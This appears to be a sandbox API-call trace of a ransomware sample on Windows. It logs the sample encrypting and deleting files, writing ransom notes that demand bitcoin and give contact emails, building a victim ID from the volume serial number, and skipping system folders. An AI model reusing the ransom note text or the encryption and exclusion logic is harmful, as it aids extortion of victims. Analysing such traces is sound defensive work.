	[0175.903] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.904] WriteFile (in: hFile=0x39c, lpBuffer=0xfdc6a8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdc6a8*, lpNumberOfBytesWritten=0x18a648*=0x110, lpOverlapped=0x0) returned 1
	[0175.906] CloseHandle (hObject=0x39c) returned 1
	[0175.906] CloseHandle (hObject=0x390) returned 1
	[0175.907] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml")) returned 1
	[0175.909] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\masterdatastore.xml")) returned 0
	[0175.910] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0175.910] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0175.910] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0175.911] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0175.912] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}"
	[0175.912] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*"
	[0175.912] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.912] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.912] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 108
	[0175.912] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0175.913] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0175.913] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0175.918] CloseHandle (hObject=0x388) returned 1
	[0175.918] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.918] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.919] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0175.920] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0175.920] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0175.920] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0175.921] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0175.921] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0175.921] CloseHandle (hObject=0x388) returned 1
	[0175.921] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.921] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.922] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0175.922] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 109
	[0175.922] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0175.922] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0175.922] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0175.925] CloseHandle (hObject=0x388) returned 1
	[0175.925] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.925] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.926] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0175.927] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.927] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0175.927] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0175.928] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.928] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0175.928] CloseHandle (hObject=0x388) returned 1
	[0175.928] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x82612aef, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x82638b7b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0175.928] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*") returned 84
	[0175.929] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.929] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*") returned 0x54
	[0175.929] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.929] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="windows") returned 0x0
	[0175.929] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.929] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="boot") returned 0x0
	[0175.929] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.930] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="system volume information") returned 0x0
	[0175.930] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.930] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.930] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.930] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="temp") returned 0x0
	[0175.930] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.930] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="program files") returned 0x0
	[0175.930] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.931] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.931] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.931] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="appdata") returned 0x0
	[0175.931] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.931] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="application data") returned 0x0
	[0175.931] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.931] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="winnt") returned 0x0
	[0175.931] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.932] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="tmp") returned 0x0
	[0175.933] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.933] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="cache") returned 0x0
	[0175.933] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.933] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.933] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.933] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="webcache") returned 0x0
	[0175.933] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.934] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="inetcache") returned 0x0
	[0175.934] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.934] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="nvidia") returned 0x0
	[0175.934] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.934] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="packages") returned 0x0
	[0175.934] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.934] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="cookies") returned 0x0
	[0175.934] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.935] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="programdata") returned 0x0
	[0175.935] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0175.935] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0175.935] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x82612aef, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x82638b7b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0175.936] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0175.936] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x825c63fe, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x825c63fe, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x825c63fe, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x6ec0, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CUSTOM~1.SCL")) returned 1
	[0175.936] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82638b7b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x82638b7b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x82638b7b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0175.936] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82612aef, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x82612aef, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x82638b7b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0175.936] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82612aef, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x82612aef, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x82612aef, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MASTER~1.SCL")) returned 1
	[0175.936] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0175.936] lstrcmpW (lpString1="Prov", lpString2="..") returned 1
	[0175.936] lstrcmpW (lpString1="Prov", lpString2=".") returned 1
	[0175.936] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}"
	[0175.937] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\"
	[0175.937] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\", lpString2="Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov"
	[0175.937] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov"
	[0175.937] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\"
	[0175.937] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\"
	[0175.937] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\*.*"
	[0175.937] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0175.946] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\*.*") returned 89
	[0175.946] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
